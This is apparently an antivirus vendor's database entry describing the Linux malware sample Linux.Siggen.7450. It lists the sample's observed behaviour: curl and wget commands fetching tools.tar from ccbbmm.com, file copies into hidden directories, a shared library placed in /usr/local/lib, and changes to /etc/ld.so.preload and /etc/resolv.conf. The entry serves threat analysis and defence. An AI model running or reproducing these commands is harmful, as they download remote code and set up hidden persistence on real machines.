Linux.Siggen.7450
Added to the Dr.Web virus database: 2024-05-14
Virus description added: 2024-05-13
Technical Information
Malicious functions:
Performs process tracing:
Launches processes:
- curl -O ccbbmm.com/tools.tar
- pgrep -c rcu_tasked
- mkdir -p /usr/bin/mslog/.cfg/
- /usr/bin/dpkg --print-foreign-architectures
- mv player /usr/bin/
- tar xvf tools.tar
- chmod 777 /root/.cfg/rcu_tasked
- <SAMPLE_FULL_PATH> -c exec \x27<SAMPLE_FULL_PATH>\x27 \x22$@\x22 <SAMPLE_FULL_PATH>
- mv libextrasshd.so /usr/local/lib/
- wget ccbbmm.com/tools.tar
- <0x7b>
- mkdir -p /root/.cfg
- apt install wget -y
- chmod +x *
- cp -a /root/.cfg/dealer /usr/bin/mslog/.cfg/
- rm -rf /usr/bin/mslog/.cfg/pass*
- cp -a /root/.cfg/tools.tar /usr/bin/mslog/.cfg/
- cp -f /usr/bin/mslog/.cfg/* /root/.cfg/
- cp -a /root/.cfg/rcu_tasked /usr/bin/mslog/.cfg/
- apt install curl -y
- sleep 1
Kills the following processes:
Performs operations with the file system:
Modifies file access rights:
- /var/cache/apt/archives/partial
- /var/lib/apt/lists/auxfiles
Modifies file owner:
- /var/cache/apt/archives/partial
- /var/lib/apt/lists/auxfiles
Creates folders:
- /root/.cfg
- /usr/bin/mslog
- /usr/bin/mslog/.cfg
Creates or modifies files:
- /etc/ld.so.preload
- /etc/resolv.conf
- /tmp/#130834 (deleted)
- /var/lib/dpkg/lock-frontend
- /var/lib/dpkg/lock
- /var/cache/apt/archives/lock
Network activity:
Establishes connection:
DNS ASK:
Other:
Collects OS information
Collects CPU information
Curing recommendations